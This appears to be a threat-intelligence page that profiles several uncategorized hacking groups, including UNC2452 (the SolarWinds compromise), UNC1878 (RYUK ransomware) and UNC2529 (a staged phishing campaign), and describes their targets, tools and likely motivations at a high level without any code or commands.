An uncategorized (UNC) threat group is a
cluster of cyber intrusion activity which includes observable
artifacts such as adversary infrastructure, tools, and attack
patterns, but is not yet classified as an advanced
persistent threat (APT) or financially motivated (FIN) group.
As more artifacts and analysis are
collected on these UNC groups, Mandiant Threat Intelligence may merge
these activity sets with other UNC groups or reclassify them during
the graduation process as a temporary (TEMP), APT or FIN group.
UNC2452 is a sophisticated group that has targeted government and
private sector entities worldwide. They have employed many unique
capabilities, including gaining initial access through a software
supply chain vulnerability.
After gaining access to a victim network, UNC2452 has a light
malware footprint, often using legitimate credentials to access data
and move laterally. The U.S. government attributed the SolarWinds
supply chain compromise which we track as UNC2452 to the Russian
Foreign Intelligence Service (SVR). Mandiant Threat Intelligence
assesses that UNC2452 activity aligns with nation-state priorities
broadly and that the group’s targeting patterns are consistent with
Russian strategic interests.
UNC1878 is a financially motivated group that monetizes their
intrusions by extorting their victims following the deployment of RYUK
ransomware. As of September 2020, Mandiant has increasingly observed
KEGTAP campaigns as the initial infection vector for UNC1878
operations; previously, UNC1878 used TrickBot for initial access.
UNC1878 has used various offensive security tools, most commonly
Cobalt Strike BEACON, along with legitimate tools and built-in
commands such as PSEXEC, WMI, and BITSadmin.
First Seen: September 2020
Source Region: Russia
Targeted Regions: 16
Motivation: Finacial Gain
Associated Malware: ANCHOR, BEACON, BLUESPINE, CONTI + 23
UNC1945 is a group that has been observed targeting a number of
organizations in the telecommunications, financial, and business
services industries since at least early 2018. The goal of UNC1945 is
currently unknown because Mandiant has not been able to observe the
activities that followed UNC1945 compromises. Based on available
information Mandiant has not been able to assess a general location
that the group operates from.
UNC2529 is a well-resourced and experienced group that has targeted
multiple organizations across numerous industries in a global phishing
campaign. They have used phishing emails containing inline links to
malicious URLs hosting DOUBLEDRAG malware, a highly obfuscated
Excel documents as a first stage downloader. DOUBLEDRAG attempts to
download a second-stage obfuscated PowerShell memory-only dropper,
which Mandiant tracks as DOUBLEDROP, that will launch a backdoor into
memory. This third-stage backdoor is tracked as DOUBLEBACK. UNC2529
displayed indications of target research based on their selection of
sender email addresses and subject lines which were tailored to their
intended victims. Although Mandiant has no data on the objectives of
this threat actor, their broad targeting across industries and
geographies is consistent with a targeting calculus most commonly seen
among financially motivated groups.